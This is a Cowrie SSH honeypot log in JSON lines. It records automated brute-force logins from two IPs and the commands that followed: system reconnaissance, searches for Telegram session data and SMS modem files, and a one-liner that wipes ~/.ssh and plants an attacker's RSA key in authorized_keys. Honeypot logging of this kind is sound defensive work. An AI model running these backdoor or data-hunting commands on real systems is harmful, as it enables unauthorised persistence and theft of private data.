{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:08:02.234729Z","src_ip":"212.227.235.229","session":"b211888e40dc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:08:02.415913Z","src_ip":"212.227.235.229","session":"b211888e40dc"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:08:03.181486Z","src_ip":"212.227.235.229","session":"b211888e40dc"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:04.366039Z","src_ip":"212.227.235.229","session":"b211888e40dc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":47250,"dst_ip":"1.2.3.4","dst_port":22,"session":"db4db48b03dd","protocol":"ssh","message":"New connection: 212.227.235.229:47250 (1.2.3.4:22) [session: db4db48b03dd]","sensor":"my-vps","timestamp":"2025-08-28T15:08:04.546274Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:08:04.547300Z","src_ip":"212.227.235.229","session":"db4db48b03dd"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:08:04.730190Z","src_ip":"212.227.235.229","session":"db4db48b03dd"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:08:05.502387Z","src_ip":"212.227.235.229","session":"db4db48b03dd"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:05.686695Z","src_ip":"212.227.235.229","session":"ff9d808a982a"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:05.687702Z","src_ip":"212.227.235.229","session":"db4db48b03dd"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44188,"dst_ip":"1.2.3.4","dst_port":22,"session":"90c54e3dd7d2","protocol":"ssh","message":"New connection: 212.227.125.160:44188 (1.2.3.4:22) [session: 90c54e3dd7d2]","sensor":"my-vps","timestamp":"2025-08-28T15:08:08.488586Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T15:08:08.489267Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-28T15:08:08.550250Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T15:08:09.071213Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:08:10.134177Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:10.275382Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T15:08:10.276088Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T15:08:10.276718Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:10.339464Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:10.520389Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-28T15:08:10.521075Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:10.583074Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:11.155678Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.156503Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.223276Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:11.363101Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.363873Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","size":1412,"shasum":"52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/52a532334011a67d1c41a57eea38ed25893bff4b6c264c748c3f2df576a47f4a after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.430892Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:11.619142Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"ps | grep '[Mm]iner'","message":"CMD: ps | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.620042Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","size":0,"shasum":"4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/4e9fdfe29ef2ada08ab1e29f7b3ef7d297dfa86d002069289e7a7ae21b343904 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.682309Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:11.862114Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"ps -ef | grep '[Mm]iner'","message":"CMD: ps -ef | grep '[Mm]iner'","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.862940Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","size":0,"shasum":"e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/e5cefcb1b141654b896106c8dc78ae972511ca8772b28e593dbe256993fa8437 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:11.924875Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:12.107668Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","message":"CMD: ls -la ~/.local/share/TelegramDesktop/tdata /home/*/.local/share/TelegramDesktop/tdata /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*","sensor":"my-vps","timestamp":"2025-08-28T15:08:12.108495Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","size":794,"shasum":"722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/722079119c91e28374578deb867362aea3f1e9381c78fc96d6228dc393ea6c05 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:12.172774Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:12.354013Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"locate D877F783D5D3EF8Cs","message":"CMD: locate D877F783D5D3EF8Cs","sensor":"my-vps","timestamp":"2025-08-28T15:08:12.354705Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","size":0,"shasum":"3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3fabfde4895f276b5d2448dc4d097af08b38b65d732145b525aab43e562d6bfa after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:12.448386Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:08:12.945630Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.command.input","input":"echo Hi | cat -n","message":"CMD: echo Hi | cat -n","sensor":"my-vps","timestamp":"2025-08-28T15:08:12.946290Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","size":11,"shasum":"3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/3e8341eade715d716ae9fe37db380fb9cab5f953782fe691fcf3af29041a344e after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:13.008451Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.closed","duration":"27.3","message":"Connection lost after 27.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:08:35.769037Z","src_ip":"212.227.125.160","session":"90c54e3dd7d2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43936,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d347b8a36c7","protocol":"ssh","message":"New connection: 212.227.235.229:43936 (1.2.3.4:22) [session: 3d347b8a36c7]","sensor":"my-vps","timestamp":"2025-08-28T15:09:10.203899Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:09:10.204717Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:09:10.388865Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.login.success","username":"root","password":"Lk@123456","message":"login attempt [root/Lk@123456] succeeded","sensor":"my-vps","timestamp":"2025-08-28T15:09:11.166835Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:09:11.550941Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:09:11.551610Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T15:09:11.553057Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:09:11.738927Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T15:09:12.166306Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T15:09:12.167254Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T15:09:12.353635Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:09:12.354769Z","src_ip":"212.227.235.229","session":"3d347b8a36c7"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44580,"dst_ip":"1.2.3.4","dst_port":22,"session":"09aca5659658","protocol":"ssh","message":"New connection: 212.227.235.229:44580 (1.2.3.4:22) [session: 09aca5659658]","sensor":"my-vps","timestamp":"2025-08-28T15:09:12.531419Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:09:12.532091Z","src_ip":"212.227.235.229","session":"09aca5659658"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T15:09:12.711859Z","src_ip":"212.227.235.229","session":"09aca5659658"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T15:09:13.475051Z","src_ip":"212.227.235.229","session":"09aca5659658"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T15:09:14.658031Z","src_ip":"212.227.235.229","session":"09aca5659658"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45702,"dst_ip":"1.2.3.4","dst_port":22,"session":"895360565272","protocol":"ssh","message":"New connection: 212.227.235.229:45702 (1.2.3.4:22) [session: 895360565272]","sensor":"my-vps","timestamp":"2025-08-28T15:09:14.841697Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T15:09:14.842452Z","src_ip":"212.227.235.229","session":"895360565272"}
